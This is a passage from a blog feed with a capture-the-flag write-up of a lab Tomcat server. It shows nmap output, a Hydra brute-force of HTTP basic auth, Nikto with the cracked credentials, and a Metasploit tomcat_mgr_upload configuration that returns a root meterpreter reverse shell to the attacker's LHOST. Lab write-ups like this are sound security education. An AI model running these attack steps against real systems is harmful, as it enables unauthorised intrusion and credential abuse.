|     	MSF:ILITIES/CENTOS_LINUX-CVE-2018-1283/	3.5	https://vulners.com/metasploit/MSF:ILITIES/CENTOS_LINUX-CVE-2018-1283/	*EXPLOIT*
|     	CVE-2018-1283	3.5	https://vulners.com/cve/CVE-2018-1283
|     	CVE-2016-8612	3.3	https://vulners.com/cve/CVE-2016-8612
|     	PACKETSTORM:152441	0.0	https://vulners.com/packetstorm/PACKETSTORM:152441	*EXPLOIT*
|_    	MSF:EXPLOIT/UNIX/WEBAPP/JOOMLA_MEDIA_UPLOAD_EXEC/	0.0	https://vulners.com/metasploit/MSF:EXPLOIT/UNIX/WEBAPP/JOOMLA_MEDIA_UPLOAD_EXEC/	*EXPLOIT*
|_http-dombased-xss: Couldn&#039;t find any DOM based XSS.
1234/tcp open  http    Apache Tomcat/Coyote JSP engine 1.1
|_http-csrf: Couldn&#039;t find any CSRF vulnerabilities.
| http-enum:
|   /examples/: Sample scripts
|   /manager/html/upload: Apache Tomcat (401 Unauthorized)
|   /manager/html: Apache Tomcat (401 Unauthorized)
|_  /docs/: Potentially interesting folder
|_http-stored-xss: Couldn&#039;t find any stored XSS vulnerabilities.
|_http-server-header: Apache-Coyote/1.1
|_http-dombased-xss: Couldn&#039;t find any DOM based XSS.
8009/tcp open  ajp13   Apache Jserv (Protocol v1.3)
No exact OS matches for host (If you know what OS is running on it, see https://nmap.org/submit/ ).
TCP/IP fingerprint:
OS:SCAN(V=7.92%E=4%D=1/30%OT=22%CT=1%CU=32123%PV=Y%DS=4%DC=T%G=Y%TM=61F71BC
OS:5%P=x86_64-pc-linux-gnu)SEQ(SP=104%GCD=1%ISR=10F%TI=Z%TS=8)SEQ(SP=104%GC
OS:D=1%ISR=10D%TI=Z%CI=I%II=I%TS=8)OPS(O1=M506ST11NW7%O2=M506ST11NW7%O3=M50
OS:6NNT11NW7%O4=M506ST11NW7%O5=M506ST11NW7%O6=M506ST11)WIN(W1=68DF%W2=68DF%
OS:W3=68DF%W4=68DF%W5=68DF%W6=68DF)ECN(R=Y%DF=Y%T=40%W=6903%O=M506NNSNW7%CC
OS:=Y%Q=)T1(R=Y%DF=Y%T=40%S=O%A=S+%F=AS%RD=0%Q=)T2(R=N)T3(R=N)T4(R=Y%DF=Y%T
OS:=40%W=0%S=A%A=Z%F=R%O=%RD=0%Q=)T5(R=Y%DF=Y%T=40%W=0%S=Z%A=S+%F=AR%O=%RD=
OS:0%Q=)T6(R=Y%DF=Y%T=40%W=0%S=A%A=Z%F=R%O=%RD=0%Q=)T7(R=Y%DF=Y%T=40%W=0%S=
OS:Z%A=S+%F=AR%O=%RD=0%Q=)U1(R=Y%DF=N%T=40%IPL=164%UN=0%RIPL=G%RID=G%RIPCK=
OS:G%RUCK=G%RUD=G)IE(R=Y%DFI=N%T=40%CD=S)

Uptime guess: 0.019 days (since Sun Jan 30 15:47:12 2022)
Network Distance: 4 hops
TCP Sequence Prediction: Difficulty=261 (Good luck!)
IP ID Sequence Generation: All zeros
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

TRACEROUTE (using port 443/tcp)
HOP RTT       ADDRESS
1   29.74 ms  10.13.0.1
2   ... 3
4   171.05 ms 10.10.28.154

Read data files from: /usr/bin/../share/nmap
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Sun Jan 30 16:14:13 2022 -- 1 IP address (1 host up) scanned in 1300.33 seconds
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;So, we’ve got the following ports:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;22: OpenSSH (&lt;a href=&quot;https://nmap.org/&quot; class=&quot;external external-link&quot; target=&quot;_blank&quot;&gt;Nmap&lt;svg aria-hidden=&quot;true&quot; class=&quot;external-icon&quot; style=&quot;max-width:0.8em;max-height:0.8em&quot; viewBox=&quot;0 0 512 512&quot;&gt;&lt;path d=&quot;M320 0H288V64h32 82.7L201.4 265.4 178.7 288 224 333.3l22.6-22.6L448 109.3V192v32h64V192 32 0H480 320zM32 32H0V64 480v32H32 456h32V480 352 320H424v32 96H64V96h96 32V32H160 32z&quot;&gt;&lt;/path&gt;&lt;/svg&gt;&lt;/a&gt; says it’s 7.2p2, but connecting to it directly reveals it to be 8.7p1)&lt;/li&gt;
&lt;li&gt;80: Apache httpd 2.4.18&lt;/li&gt;
&lt;li&gt;1234: Apache Tomcat + Coyote 1.1&lt;/li&gt;
&lt;li&gt;8009: Apache Jserv 1.3&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;There’s a hidden /protected/ directory on port 80 that seems to be password-protected.&lt;/p&gt;
&lt;p&gt;No obvious exploits here.&lt;/p&gt;
&lt;p&gt;We’ll also run a scan with dirbuster (normally I use &lt;a href=&quot;https://github.com/Oj/gobuster&quot; class=&quot;external external-link&quot; target=&quot;_blank&quot;&gt;gobuster&lt;svg aria-hidden=&quot;true&quot; class=&quot;external-icon&quot; style=&quot;max-width:0.8em;max-height:0.8em&quot; viewBox=&quot;0 0 512 512&quot;&gt;&lt;path d=&quot;M320 0H288V64h32 82.7L201.4 265.4 178.7 288 224 333.3l22.6-22.6L448 109.3V192v32h64V192 32 0H480 320zM32 32H0V64 480v32H32 456h32V480 352 320H424v32 96H64V96h96 32V32H160 32z&quot;&gt;&lt;/path&gt;&lt;/svg&gt;&lt;/a&gt;, but I’m trying to operate in the spirit of this CTF):&lt;/p&gt;
&lt;figure data-rehype-pretty-code-figure=&quot;&quot;&gt;&lt;pre style=&quot;--shiki-light:#3c3836;--shiki-dark:#ebdbb2;--shiki-light-bg:#f2e5bc;--shiki-dark-bg:#32302f&quot; tabindex=&quot;0&quot; data-language=&quot;bash&quot; data-theme=&quot;gruvbox-light-soft gruvbox-dark-soft&quot;&gt;&lt;code data-language=&quot;bash&quot; data-theme=&quot;gruvbox-light-soft gruvbox-dark-soft&quot; style=&quot;display: grid;&quot;&gt;&lt;span data-line=&quot;&quot;&gt;&lt;span style=&quot;--shiki-light:#B57614;--shiki-dark:#FABD2F&quot; data-token-type=&quot;function&quot;&gt;dirbuster&lt;/span&gt;&lt;span style=&quot;--shiki-light:#8F3F71;--shiki-dark:#D3869B&quot; data-token-type=&quot;string&quot;&gt; \&lt;/span&gt;&lt;/span&gt;
&lt;span data-line=&quot;&quot;&gt;&lt;span style=&quot;--shiki-light:#8F3F71;--shiki-dark:#D3869B&quot; data-token-type=&quot;value&quot;&gt;	-l&lt;/span&gt;&lt;span style=&quot;--shiki-light:#79740E;--shiki-dark:#B8BB26&quot; data-token-type=&quot;string&quot;&gt; /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt&lt;/span&gt;&lt;span style=&quot;--shiki-light:#8F3F71;--shiki-dark:#D3869B&quot; data-token-type=&quot;string&quot;&gt; \&lt;/span&gt;&lt;/span&gt;
&lt;span data-line=&quot;&quot;&gt;&lt;span style=&quot;--shiki-light:#8F3F71;--shiki-dark:#D3869B&quot; data-token-type=&quot;value&quot;&gt;	-u&lt;/span&gt;&lt;span style=&quot;--shiki-light:#79740E;--shiki-dark:#B8BB26&quot; data-token-type=&quot;string&quot;&gt; http://10.10.28.154&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/figure&gt;
&lt;p&gt;This finds the following directories:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;/icons/&lt;/li&gt;
&lt;li&gt;/icons/small/&lt;/li&gt;
&lt;li&gt;/guidelines/&lt;/li&gt;
&lt;li&gt;/protected/&lt;/li&gt;
&lt;li&gt;/server-status/&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;Going to &lt;code&gt;http://10.10.28.154/guidelines/&lt;/code&gt; reveals a single message:&lt;/p&gt;
&lt;figure data-rehype-pretty-code-figure=&quot;&quot;&gt;&lt;pre style=&quot;--shiki-light:#3c3836;--shiki-dark:#ebdbb2;--shiki-light-bg:#f2e5bc;--shiki-dark-bg:#32302f&quot; tabindex=&quot;0&quot; data-language=&quot;html&quot; data-theme=&quot;gruvbox-light-soft gruvbox-dark-soft&quot;&gt;&lt;code data-language=&quot;html&quot; data-theme=&quot;gruvbox-light-soft gruvbox-dark-soft&quot; style=&quot;display: grid;&quot;&gt;&lt;span data-line=&quot;&quot;&gt;&lt;span style=&quot;--shiki-light:#3C3836;--shiki-dark:#EBDBB2&quot;&gt;Hey &lt;/span&gt;&lt;span style=&quot;--shiki-light:#076678;--shiki-dark:#83A598&quot; data-token-type=&quot;punctuation&quot;&gt;&amp;#x3C;&lt;/span&gt;&lt;span style=&quot;--shiki-light:#427B58;--shiki-light-font-weight:bold;--shiki-dark:#8EC07C;--shiki-dark-font-weight:bold&quot; data-token-type=&quot;tag&quot;&gt;b&lt;/span&gt;&lt;span style=&quot;--shiki-light:#076678;--shiki-dark:#83A598&quot; data-token-type=&quot;punctuation&quot;&gt;&gt;&lt;/span&gt;&lt;span style=&quot;--shiki-light:#3C3836;--shiki-dark:#EBDBB2&quot;&gt;bob&lt;/span&gt;&lt;span style=&quot;--shiki-light:#076678;--shiki-dark:#83A598&quot; data-token-type=&quot;punctuation&quot;&gt;&amp;#x3C;/&lt;/span&gt;&lt;span style=&quot;--shiki-light:#427B58;--shiki-light-font-weight:bold;--shiki-dark:#8EC07C;--shiki-dark-font-weight:bold&quot; data-token-type=&quot;tag&quot;&gt;b&lt;/span&gt;&lt;span style=&quot;--shiki-light:#076678;--shiki-dark:#83A598&quot; data-token-type=&quot;punctuation&quot;&gt;&gt;&lt;/span&gt;&lt;span style=&quot;--shiki-light:#3C3836;--shiki-dark:#EBDBB2&quot;&gt;, did you update that TomCat server?&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/figure&gt;
&lt;p&gt;So, that kinda does imply that Tomcat or Coyote might be vulnerable, even though I couldn’t find anything obvious on &lt;a href=&quot;https://www.exploit-db.com&quot; class=&quot;external external-link&quot; target=&quot;_blank&quot;&gt;Exploit DB&lt;svg aria-hidden=&quot;true&quot; class=&quot;external-icon&quot; style=&quot;max-width:0.8em;max-height:0.8em&quot; viewBox=&quot;0 0 512 512&quot;&gt;&lt;path d=&quot;M320 0H288V64h32 82.7L201.4 265.4 178.7 288 224 333.3l22.6-22.6L448 109.3V192v32h64V192 32 0H480 320zM32 32H0V64 480v32H32 456h32V480 352 320H424v32 96H64V96h96 32V32H160 32z&quot;&gt;&lt;/path&gt;&lt;/svg&gt;&lt;/a&gt;. I’ll come back to that.&lt;/p&gt;
&lt;p&gt;We’ll deploy &lt;a href=&quot;https://github.com/vanhauser-thc/thc-hydra&quot; class=&quot;external external-link&quot; target=&quot;_blank&quot;&gt;Hydra&lt;svg aria-hidden=&quot;true&quot; class=&quot;external-icon&quot; style=&quot;max-width:0.8em;max-height:0.8em&quot; viewBox=&quot;0 0 512 512&quot;&gt;&lt;path d=&quot;M320 0H288V64h32 82.7L201.4 265.4 178.7 288 224 333.3l22.6-22.6L448 109.3V192v32h64V192 32 0H480 320zM32 32H0V64 480v32H32 456h32V480 352 320H424v32 96H64V96h96 32V32H160 32z&quot;&gt;&lt;/path&gt;&lt;/svg&gt;&lt;/a&gt; against the http-basic authentication protecting /protected/. I’ve never done this before, but a quick internet search reveals &lt;a href=&quot;http://tylerrockwell.github.io/defeating-basic-auth-with-hydra/&quot; class=&quot;external external-link&quot; target=&quot;_blank&quot;&gt;a potentially useful guide&lt;svg aria-hidden=&quot;true&quot; class=&quot;external-icon&quot; style=&quot;max-width:0.8em;max-height:0.8em&quot; viewBox=&quot;0 0 512 512&quot;&gt;&lt;path d=&quot;M320 0H288V64h32 82.7L201.4 265.4 178.7 288 224 333.3l22.6-22.6L448 109.3V192v32h64V192 32 0H480 320zM32 32H0V64 480v32H32 456h32V480 352 320H424v32 96H64V96h96 32V32H160 32z&quot;&gt;&lt;/path&gt;&lt;/svg&gt;&lt;/a&gt;, as well as &lt;a href=&quot;https://www.hackingarticles.in/multiple-ways-to-exploiting-http-authentication/&quot; class=&quot;external external-link&quot; target=&quot;_blank&quot;&gt;an additional walk-through&lt;svg aria-hidden=&quot;true&quot; class=&quot;external-icon&quot; style=&quot;max-width:0.8em;max-height:0.8em&quot; viewBox=&quot;0 0 512 512&quot;&gt;&lt;path d=&quot;M320 0H288V64h32 82.7L201.4 265.4 178.7 288 224 333.3l22.6-22.6L448 109.3V192v32h64V192 32 0H480 320zM32 32H0V64 480v32H32 456h32V480 352 320H424v32 96H64V96h96 32V32H160 32z&quot;&gt;&lt;/path&gt;&lt;/svg&gt;&lt;/a&gt; clarifying how to use &lt;a href=&quot;https://github.com/vanhauser-thc/thc-hydra&quot; class=&quot;external external-link&quot; target=&quot;_blank&quot;&gt;Hydra&lt;svg aria-hidden=&quot;true&quot; class=&quot;external-icon&quot; style=&quot;max-width:0.8em;max-height:0.8em&quot; viewBox=&quot;0 0 512 512&quot;&gt;&lt;path d=&quot;M320 0H288V64h32 82.7L201.4 265.4 178.7 288 224 333.3l22.6-22.6L448 109.3V192v32h64V192 32 0H480 320zM32 32H0V64 480v32H32 456h32V480 352 320H424v32 96H64V96h96 32V32H160 32z&quot;&gt;&lt;/path&gt;&lt;/svg&gt;&lt;/a&gt; to crack Apache conf-based http-basic authentication. With this information in hand, we should (hopefully) be able to crack Bob’s password using the following:&lt;/p&gt;
&lt;figure data-rehype-pretty-code-figure=&quot;&quot;&gt;&lt;pre style=&quot;--shiki-light:#3c3836;--shiki-dark:#ebdbb2;--shiki-light-bg:#f2e5bc;--shiki-dark-bg:#32302f&quot; tabindex=&quot;0&quot; data-language=&quot;bash&quot; data-theme=&quot;gruvbox-light-soft gruvbox-dark-soft&quot;&gt;&lt;code data-language=&quot;bash&quot; data-theme=&quot;gruvbox-light-soft gruvbox-dark-soft&quot; style=&quot;display: grid;&quot;&gt;&lt;span data-line=&quot;&quot;&gt;&lt;span style=&quot;--shiki-light:#B57614;--shiki-dark:#FABD2F&quot; data-token-type=&quot;function&quot;&gt;hydra&lt;/span&gt;&lt;span style=&quot;--shiki-light:#8F3F71;--shiki-dark:#D3869B&quot; data-token-type=&quot;value&quot;&gt; -l&lt;/span&gt;&lt;span style=&quot;--shiki-light:#79740E;--shiki-dark:#B8BB26&quot; data-token-type=&quot;string&quot;&gt; bob&lt;/span&gt;&lt;span style=&quot;--shiki-light:#8F3F71;--shiki-dark:#D3869B&quot; data-token-type=&quot;string&quot;&gt; \&lt;/span&gt;&lt;/span&gt;
&lt;span data-line=&quot;&quot;&gt;&lt;span style=&quot;--shiki-light:#8F3F71;--shiki-dark:#D3869B&quot; data-token-type=&quot;value&quot;&gt;      -P&lt;/span&gt;&lt;span style=&quot;--shiki-light:#79740E;--shiki-dark:#B8BB26&quot; data-token-type=&quot;string&quot;&gt; ~/.local/share/red-team/wordlists/rockyou.txt&lt;/span&gt;&lt;span style=&quot;--shiki-light:#8F3F71;--shiki-dark:#D3869B&quot; data-token-type=&quot;string&quot;&gt; \&lt;/span&gt;&lt;/span&gt;
&lt;span data-line=&quot;&quot;&gt;&lt;span style=&quot;--shiki-light:#8F3F71;--shiki-dark:#D3869B&quot; data-token-type=&quot;value&quot;&gt;      -f&lt;/span&gt;&lt;span style=&quot;--shiki-light:#8F3F71;--shiki-dark:#D3869B&quot; data-token-type=&quot;value&quot;&gt; -vV&lt;/span&gt;&lt;span style=&quot;--shiki-light:#79740E;--shiki-dark:#B8BB26&quot; data-token-type=&quot;string&quot;&gt; http-get://10.10.28.154/protected/&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/figure&gt;
&lt;p&gt;I’m kinda curious what’s in /protected/. Unfortunately, the experience is kinda anti-climatic.&lt;/p&gt;
&lt;figure data-rehype-pretty-code-figure=&quot;&quot;&gt;&lt;pre style=&quot;--shiki-light:#3c3836;--shiki-dark:#ebdbb2;--shiki-light-bg:#f2e5bc;--shiki-dark-bg:#32302f&quot; tabindex=&quot;0&quot; data-language=&quot;html&quot; data-theme=&quot;gruvbox-light-soft gruvbox-dark-soft&quot;&gt;&lt;code data-language=&quot;html&quot; data-theme=&quot;gruvbox-light-soft gruvbox-dark-soft&quot; style=&quot;display: grid;&quot;&gt;&lt;span data-line=&quot;&quot;&gt;&lt;span style=&quot;--shiki-light:#076678;--shiki-dark:#83A598&quot; data-token-type=&quot;punctuation&quot;&gt;&amp;#x3C;&lt;/span&gt;&lt;span style=&quot;--shiki-light:#B16286;--shiki-light-font-weight:bold;--shiki-dark:#B16286;--shiki-dark-font-weight:bold&quot; data-token-type=&quot;error&quot;&gt;center&lt;/span&gt;&lt;span style=&quot;--shiki-light:#076678;--shiki-dark:#83A598&quot; data-token-type=&quot;punctuation&quot;&gt;&gt;&amp;#x3C;/&lt;/span&gt;&lt;span style=&quot;--shiki-light:#CC241D;--shiki-light-font-weight:bold;--shiki-dark:#CC241D;--shiki-dark-font-weight:bold&quot; data-token-type=&quot;error&quot;&gt;br&lt;/span&gt;&lt;span style=&quot;--shiki-light:#076678;--shiki-dark:#83A598&quot; data-token-type=&quot;punctuation&quot;&gt;&gt;&lt;/span&gt;&lt;span style=&quot;--shiki-light:#076678;--shiki-dark:#83A598&quot; data-token-type=&quot;punctuation&quot;&gt; &amp;#x3C;&lt;/span&gt;&lt;span style=&quot;--shiki-light:#427B58;--shiki-light-font-weight:bold;--shiki-dark:#8EC07C;--shiki-dark-font-weight:bold&quot; data-token-type=&quot;tag&quot;&gt;img&lt;/span&gt;&lt;span style=&quot;--shiki-light:#B57614;--shiki-dark:#FABD2F&quot; data-token-type=&quot;important&quot;&gt; width&lt;/span&gt;&lt;span style=&quot;--shiki-light:#7C6F64;--shiki-dark:#A89984&quot; data-token-type=&quot;punctuation&quot;&gt;=&lt;/span&gt;&lt;span style=&quot;--shiki-light:#79740E;--shiki-dark:#B8BB26&quot; data-token-type=&quot;string&quot;&gt;150&lt;/span&gt;&lt;span style=&quot;--shiki-light:#B57614;--shiki-dark:#FABD2F&quot; data-token-type=&quot;important&quot;&gt; src&lt;/span&gt;&lt;span style=&quot;--shiki-light:#7C6F64;--shiki-dark:#A89984&quot; data-token-type=&quot;punctuation&quot;&gt;=&lt;/span&gt;&lt;span style=&quot;--shiki-light:#7C6F64;--shiki-dark:#A89984&quot; data-token-type=&quot;string&quot;&gt;&quot;&lt;/span&gt;&lt;span style=&quot;--shiki-light:#79740E;--shiki-dark:#B8BB26&quot; data-token-type=&quot;string&quot;&gt;protected.png&lt;/span&gt;&lt;span style=&quot;--shiki-light:#7C6F64;--shiki-dark:#A89984&quot; data-token-type=&quot;string&quot;&gt;&quot;&lt;/span&gt;&lt;span style=&quot;--shiki-light:#076678;--shiki-dark:#83A598&quot; data-token-type=&quot;punctuation&quot;&gt;&gt;&lt;/span&gt;&lt;span style=&quot;--shiki-light:#076678;--shiki-dark:#83A598&quot; data-token-type=&quot;punctuation&quot;&gt; &amp;#x3C;&lt;/span&gt;&lt;span style=&quot;--shiki-light:#427B58;--shiki-light-font-weight:bold;--shiki-dark:#8EC07C;--shiki-dark-font-weight:bold&quot; data-token-type=&quot;tag&quot;&gt;p&lt;/span&gt;&lt;span style=&quot;--shiki-light:#076678;--shiki-dark:#83A598&quot; data-token-type=&quot;punctuation&quot;&gt;&gt;&lt;/span&gt;&lt;span style=&quot;--shiki-light:#3C3836;--shiki-dark:#EBDBB2&quot;&gt;This protected page has now moved to a different port.&lt;/span&gt;&lt;span style=&quot;--shiki-light:#076678;--shiki-dark:#83A598&quot; data-token-type=&quot;punctuation&quot;&gt;&amp;#x3C;/&lt;/span&gt;&lt;span style=&quot;--shiki-light:#427B58;--shiki-light-font-weight:bold;--shiki-dark:#8EC07C;--shiki-dark-font-weight:bold&quot; data-token-type=&quot;tag&quot;&gt;p&lt;/span&gt;&lt;span style=&quot;--shiki-light:#076678;--shiki-dark:#83A598&quot; data-token-type=&quot;punctuation&quot;&gt;&gt;&lt;/span&gt;&lt;span style=&quot;--shiki-light:#076678;--shiki-dark:#83A598&quot; data-token-type=&quot;punctuation&quot;&gt; &amp;#x3C;/&lt;/span&gt;&lt;span style=&quot;--shiki-light:#B16286;--shiki-light-font-weight:bold;--shiki-dark:#B16286;--shiki-dark-font-weight:bold&quot; data-token-type=&quot;error&quot;&gt;center&lt;/span&gt;&lt;span style=&quot;--shiki-light:#076678;--shiki-dark:#83A598&quot; data-token-type=&quot;punctuation&quot;&gt;&gt;&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/figure&gt;
&lt;p&gt;Oh well.&lt;/p&gt;
&lt;p&gt;The CTF does direct us to look at &lt;code&gt;http://10.10.28.154:1234/manager/html&lt;/code&gt; (using Bob’s password); that’s just the Tomcat documentation by the looks of it. But if we throw &lt;a href=&quot;https://cirt.net/nikto/&quot; class=&quot;external external-link&quot; target=&quot;_blank&quot;&gt;Nikto&lt;svg aria-hidden=&quot;true&quot; class=&quot;external-icon&quot; style=&quot;max-width:0.8em;max-height:0.8em&quot; viewBox=&quot;0 0 512 512&quot;&gt;&lt;path d=&quot;M320 0H288V64h32 82.7L201.4 265.4 178.7 288 224 333.3l22.6-22.6L448 109.3V192v32h64V192 32 0H480 320zM32 32H0V64 480v32H32 456h32V480 352 320H424v32 96H64V96h96 32V32H160 32z&quot;&gt;&lt;/path&gt;&lt;/svg&gt;&lt;/a&gt; against it, we can get ourselves another flag.&lt;/p&gt;
&lt;figure data-rehype-pretty-code-figure=&quot;&quot;&gt;&lt;pre style=&quot;--shiki-light:#3c3836;--shiki-dark:#ebdbb2;--shiki-light-bg:#f2e5bc;--shiki-dark-bg:#32302f&quot; tabindex=&quot;0&quot; data-language=&quot;bash&quot; data-theme=&quot;gruvbox-light-soft gruvbox-dark-soft&quot;&gt;&lt;code data-language=&quot;bash&quot; data-theme=&quot;gruvbox-light-soft gruvbox-dark-soft&quot; style=&quot;display: grid;&quot;&gt;&lt;span data-line=&quot;&quot;&gt;&lt;span style=&quot;--shiki-light:#B57614;--shiki-dark:#FABD2F&quot; data-token-type=&quot;function&quot;&gt;nikto&lt;/span&gt;&lt;span style=&quot;--shiki-light:#8F3F71;--shiki-dark:#D3869B&quot; data-token-type=&quot;value&quot;&gt; -Format&lt;/span&gt;&lt;span style=&quot;--shiki-light:#79740E;--shiki-dark:#B8BB26&quot; data-token-type=&quot;string&quot;&gt; txt&lt;/span&gt;&lt;span style=&quot;--shiki-light:#8F3F71;--shiki-dark:#D3869B&quot; data-token-type=&quot;string&quot;&gt; \&lt;/span&gt;&lt;/span&gt;
&lt;span data-line=&quot;&quot;&gt;&lt;span style=&quot;--shiki-light:#8F3F71;--shiki-dark:#D3869B&quot; data-token-type=&quot;value&quot;&gt;      -host&lt;/span&gt;&lt;span style=&quot;--shiki-light:#79740E;--shiki-dark:#B8BB26&quot; data-token-type=&quot;string&quot;&gt; http://10.10.28.154:1234/manager/html&lt;/span&gt;&lt;span style=&quot;--shiki-light:#8F3F71;--shiki-dark:#D3869B&quot; data-token-type=&quot;string&quot;&gt; \&lt;/span&gt;&lt;/span&gt;
&lt;span data-line=&quot;&quot;&gt;&lt;span style=&quot;--shiki-light:#8F3F71;--shiki-dark:#D3869B&quot; data-token-type=&quot;value&quot;&gt;      -id&lt;/span&gt;&lt;span style=&quot;--shiki-light:#79740E;--shiki-dark:#B8BB26&quot; data-token-type=&quot;string&quot;&gt; bob:bubbles&lt;/span&gt;&lt;span style=&quot;--shiki-light:#8F3F71;--shiki-dark:#D3869B&quot; data-token-type=&quot;value&quot;&gt; -nossl&lt;/span&gt;&lt;span style=&quot;--shiki-light:#8F3F71;--shiki-dark:#D3869B&quot; data-token-type=&quot;value&quot;&gt; -output&lt;/span&gt;&lt;span style=&quot;--shiki-light:#79740E;--shiki-dark:#B8BB26&quot; data-token-type=&quot;string&quot;&gt; tools-r-us.txt&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/figure&gt;
&lt;p&gt;At this point we’ve got all but two flags. The text for these imply that we can get RCE on this version of Tomcat. It looks like Apache Tomcat 7.0.88 was released on May 16, 2018. &lt;a href=&quot;https://tomcat.apache.org/security-7.html&quot; class=&quot;external external-link&quot; target=&quot;_blank&quot;&gt;There’s no obvious &lt;em&gt;vulnerability&lt;/em&gt; to exploit for this version&lt;svg aria-hidden=&quot;true&quot; class=&quot;external-icon&quot; style=&quot;max-width:0.8em;max-height:0.8em&quot; viewBox=&quot;0 0 512 512&quot;&gt;&lt;path d=&quot;M320 0H288V64h32 82.7L201.4 265.4 178.7 288 224 333.3l22.6-22.6L448 109.3V192v32h64V192 32 0H480 320zM32 32H0V64 480v32H32 456h32V480 352 320H424v32 96H64V96h96 32V32H160 32z&quot;&gt;&lt;/path&gt;&lt;/svg&gt;&lt;/a&gt;, but after searching around a bit on the net I found &lt;a href=&quot;https://www.hackingarticles.in/multiple-ways-to-exploit-tomcat-manager/&quot; class=&quot;external external-link&quot; target=&quot;_blank&quot;&gt;a guide mentioning that RCE on Tomcat could be obtained via the “manager” application&lt;svg aria-hidden=&quot;true&quot; class=&quot;external-icon&quot; style=&quot;max-width:0.8em;max-height:0.8em&quot; viewBox=&quot;0 0 512 512&quot;&gt;&lt;path d=&quot;M320 0H288V64h32 82.7L201.4 265.4 178.7 288 224 333.3l22.6-22.6L448 109.3V192v32h64V192 32 0H480 320zM32 32H0V64 480v32H32 456h32V480 352 320H424v32 96H64V96h96 32V32H160 32z&quot;&gt;&lt;/path&gt;&lt;/svg&gt;&lt;/a&gt;. And, indeed, looking at the info for the corresponding module in &lt;a href=&quot;https://www.metasploit.com/&quot; class=&quot;external external-link&quot; target=&quot;_blank&quot;&gt;Metasploit&lt;svg aria-hidden=&quot;true&quot; class=&quot;external-icon&quot; style=&quot;max-width:0.8em;max-height:0.8em&quot; viewBox=&quot;0 0 512 512&quot;&gt;&lt;path d=&quot;M320 0H288V64h32 82.7L201.4 265.4 178.7 288 224 333.3l22.6-22.6L448 109.3V192v32h64V192 32 0H480 320zM32 32H0V64 480v32H32 456h32V480 352 320H424v32 96H64V96h96 32V32H160 32z&quot;&gt;&lt;/path&gt;&lt;/svg&gt;&lt;/a&gt; (&lt;code&gt;exploit/multi/http/tomcat_mgr_upload&lt;/code&gt;) reveals that we can obtain RCE if we have access to the /manager/html/upload component. Which we &lt;em&gt;do&lt;/em&gt;, because /manager/html has the option to “Select WAR file to upload”.&lt;/p&gt;
&lt;p&gt;Now, &lt;code&gt;exploit/multi/http/tomcat_mgr_upload&lt;/code&gt; only targets 32-bit Linux, and the server is running a 64-bit build (this can also be found in /manager/html/), so we’ll use the “Java Universal” target.&lt;/p&gt;
&lt;figure data-rehype-pretty-code-figure=&quot;&quot;&gt;&lt;pre style=&quot;--shiki-light:#3c3836;--shiki-dark:#ebdbb2;--shiki-light-bg:#f2e5bc;--shiki-dark-bg:#32302f&quot; tabindex=&quot;0&quot; data-language=&quot;msfconsole&quot; data-theme=&quot;gruvbox-light-soft gruvbox-dark-soft&quot;&gt;&lt;code data-language=&quot;msfconsole&quot; data-theme=&quot;gruvbox-light-soft gruvbox-dark-soft&quot; style=&quot;display: grid;&quot;&gt;&lt;span data-line=&quot;&quot;&gt;&lt;span&gt;use exploit/multi/http/tomcat_mgr_upload&lt;/span&gt;&lt;/span&gt;
&lt;span data-line=&quot;&quot;&gt;&lt;span&gt;set HttpPassword bubbles&lt;/span&gt;&lt;/span&gt;
&lt;span data-line=&quot;&quot;&gt;&lt;span&gt;set HttpUsername bob&lt;/span&gt;&lt;/span&gt;
&lt;span data-line=&quot;&quot;&gt;&lt;span&gt;set RHOSTS 10.10.28.154&lt;/span&gt;&lt;/span&gt;
&lt;span data-line=&quot;&quot;&gt;&lt;span&gt;set RPORT 1234&lt;/span&gt;&lt;/span&gt;
&lt;span data-line=&quot;&quot;&gt;&lt;span&gt;set LHOST 10.13.26.40&lt;/span&gt;&lt;/span&gt;
&lt;span data-line=&quot;&quot;&gt;&lt;span&gt;exploit&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/figure&gt;
&lt;p&gt;And we have a meterpreter shell! Running getuid reveals that we’re also running as root. Ouch.&lt;/p&gt;
&lt;p&gt;We’ll just drop to shell in meterpreter to get the contents of /root/flag.txt.&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;Elapsed Time:&lt;/strong&gt; 3 h 7 min&lt;/p&gt; ]]></description>
    <pubDate>Sun, 30 Jan 2022 00:00:00 GMT</pubDate>
  </item><item>
    <title>Retro</title>
    <link>https://remarks.delphi-strategy.com/ctfs/2022-01-02</link>
    <guid>https://remarks.delphi-strategy.com/ctfs/2022-01-02</guid>
    <description><![CDATA[ &lt;h1 id=&quot;retro&quot;&gt;Retro&lt;a role=&quot;anchor&quot; aria-hidden tabindex=&quot;-1&quot; data-no-popover href=&quot;#retro&quot; class=&quot;internal internal-link&quot;&gt;&lt;svg width=&quot;18&quot; height=&quot;18&quot; viewBox=&quot;0 0 24 24&quot; fill=&quot;none&quot; stroke=&quot;currentColor&quot; stroke-width=&quot;2&quot; stroke-linecap=&quot;round&quot; stroke-linejoin=&quot;round&quot;&gt;&lt;path d=&quot;M10 13a5 5 0 0 0 7.54.54l3-3a5 5 0 0 0-7.07-7.07l-1.72 1.71&quot;&gt;&lt;/path&gt;&lt;path d=&quot;M14 11a5 5 0 0 0-7.54-.54l-3 3a5 5 0 0 0 7.07 7.07l1.71-1.71&quot;&gt;&lt;/path&gt;&lt;/svg&gt;&lt;/a&gt;&lt;/h1&gt;
&lt;blockquote class=&quot;callout note&quot; data-callout=&quot;note&quot;&gt;
&lt;div class=&quot;callout-title&quot;&gt;
                  &lt;div class=&quot;callout-icon&quot;&gt;&lt;/div&gt;
